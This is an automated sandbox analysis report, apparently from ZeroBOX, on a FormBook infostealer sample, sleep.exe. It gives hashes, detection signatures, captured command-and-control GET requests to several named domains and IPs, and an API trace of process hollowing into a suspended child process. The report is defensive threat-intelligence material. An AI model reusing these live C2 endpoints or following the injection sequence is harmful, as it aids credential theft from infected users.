Summary | ZeroBOX

sleep.exe

Malicious Library UPX PE32 PE File
Category Machine Started Completed
FILE s1_win7_x6401 May 25, 2022, 9:39 a.m. May 25, 2022, 9:47 a.m.
Size 270.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 e7141cadb71a36b0dcddb0ef7a67caec
SHA256 222ad93c9537bc72a00d01aaeab70acaea61210fb0de3967d671920848c87b04
CRC32 B7FE66F1
ssdeep 6144:B0Yie7CluEZs1iY/ymj9HHqREXehVBEsZ3s6okSvvJ8z:d2IQ1WRHqmXe1VrokSvvJ8z
Yara
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49167 -> 64.32.22.102:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 64.32.22.102:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 64.32.22.102:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 64.32.22.102:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 103.145.226.120:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 103.145.226.120:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 103.145.226.120:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 134.73.225.58:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 134.73.225.58:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 134.73.225.58:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 64.190.63.111:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 64.190.63.111:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 64.190.63.111:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 64.190.63.111:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.zhidao95.com/m0d4/?LL0=NAAVMfeqbK0z8vD+Qvzh9xXRUU+fA/5gjMBr3ElO5qTI90nZ+R2ISaurvJy762/h5RKa5fTC&APcPAD=dhItCFUXjf9x
suspicious_features GET method with no useragent header suspicious_request GET http://www.sdfijsdjidf.xyz/m0d4/?LL0=qa2HCuehd+OLluEj+ZaoAc9XIsur+rI4EFCYyrG+J7mbG8JHTzLv2WdBKhUJ+7SIbEylXPoH&APcPAD=dhItCFUXjf9x
suspicious_features GET method with no useragent header suspicious_request GET http://www.cryoablation.xyz/m0d4/?LL0=YUmoHpfUPyDRMD4vBz5urBozJPl1O97m0DXdDlwENz/Wz1XTyx+p7AJWswgLEjMsRwA+jz0k&APcPAD=dhItCFUXjf9x
suspicious_features GET method with no useragent header suspicious_request GET http://www.arthamandirialkesindo.com/m0d4/?LL0=mf1bYp/FUP+Ts7S79apP1hkr0w8WZdLzLYn+xRmG0PkAZk5rfm9mwOwUYcGgvUO+IESzcMgd&APcPAD=dhItCFUXjf9x
request GET http://www.zhidao95.com/m0d4/?LL0=NAAVMfeqbK0z8vD+Qvzh9xXRUU+fA/5gjMBr3ElO5qTI90nZ+R2ISaurvJy762/h5RKa5fTC&APcPAD=dhItCFUXjf9x
request GET http://www.sdfijsdjidf.xyz/m0d4/?LL0=qa2HCuehd+OLluEj+ZaoAc9XIsur+rI4EFCYyrG+J7mbG8JHTzLv2WdBKhUJ+7SIbEylXPoH&APcPAD=dhItCFUXjf9x
request GET http://www.cryoablation.xyz/m0d4/?LL0=YUmoHpfUPyDRMD4vBz5urBozJPl1O97m0DXdDlwENz/Wz1XTyx+p7AJWswgLEjMsRwA+jz0k&APcPAD=dhItCFUXjf9x
request GET http://www.arthamandirialkesindo.com/m0d4/?LL0=mf1bYp/FUP+Ts7S79apP1hkr0w8WZdLzLYn+xRmG0PkAZk5rfm9mwOwUYcGgvUO+IESzcMgd&APcPAD=dhItCFUXjf9x
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73a12000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2836
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01cf0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2920
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\spegyl.exe
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2920
region_size: 192512
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000108
1 0 0
Process injection Process 2836 called NtSetContextThread to modify thread in remote process 2920
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2003108292
registers.esp: 1638384
registers.edi: 0
registers.eax: 4321504
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000104
process_identifier: 2920
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2840
thread_handle: 0x000001ec
process_identifier: 2836
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\spegyl.exe C:\Users\test22\AppData\Local\Temp\xkdvcet
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x000001f0
1 1 0

CreateProcessInternalW

thread_identifier: 2924
thread_handle: 0x00000104
process_identifier: 2920
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\spegyl.exe
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\spegyl.exe C:\Users\test22\AppData\Local\Temp\xkdvcet
filepath_r: C:\Users\test22\AppData\Local\Temp\spegyl.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000108
1 1 0

NtGetContextThread

thread_handle: 0x00000104
1 0 0

NtAllocateVirtualMemory

process_identifier: 2920
region_size: 192512
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000108
1 0 0

NtSetContextThread

registers.eip: 2003108292
registers.esp: 1638384
registers.edi: 0
registers.eax: 4321504
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000104
process_identifier: 2920
1 0 0
Lionic Trojan.Multi.Generic.4!c
Elastic malicious (high confidence)
MicroWorld-eScan MemScan:Trojan.GenericKDZ.88086
ALYac Trojan.NSISX.Spy.Gen.1
Cylance Unsafe
CrowdStrike win/malicious_confidence_90% (W)
Alibaba Trojan:Win32/NSISInject.d4c72411
K7GW Trojan ( 0059353a1 )
Arcabit Trojan.NSISX.Spy.Gen.1
BitDefenderTheta Gen:NN.ZexaF.34682.imW@aKvVgGk
Cyren W32/Injector.AXL.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Injector.ERRO
Paloalto generic.ml
Kaspersky HEUR:Trojan.Win32.Injexa.gen
BitDefender MemScan:Trojan.GenericKDZ.88086
Avast Win32:InjectorX-gen [Trj]
Emsisoft MemScan:Trojan.GenericKDZ.88086 (B)
TrendMicro TROJ_GEN.R002C0DEO22
McAfee-GW-Edition BehavesLike.Win32.Dropper.dc
SentinelOne Static AI - Suspicious PE
FireEye MemScan:Trojan.GenericKDZ.88086
Sophos Mal/Generic-S
Ikarus Trojan-Spy.Agent
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:Win32/FormBook.SM!MTB
GData Win32.Trojan.Agent.EKMHPU
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.NSISInject.R493993
McAfee Artemis!E7141CADB71A
APEX Malicious
Rising Trojan.Generic@AI.88 (RDML:GBYTzDuXDDEpk6PIO3Outw)
MAX malware (ai score=84)
Fortinet W32/Injector.ERQA!tr
AVG Win32:InjectorX-gen [Trj]
Cybereason malicious.6a673d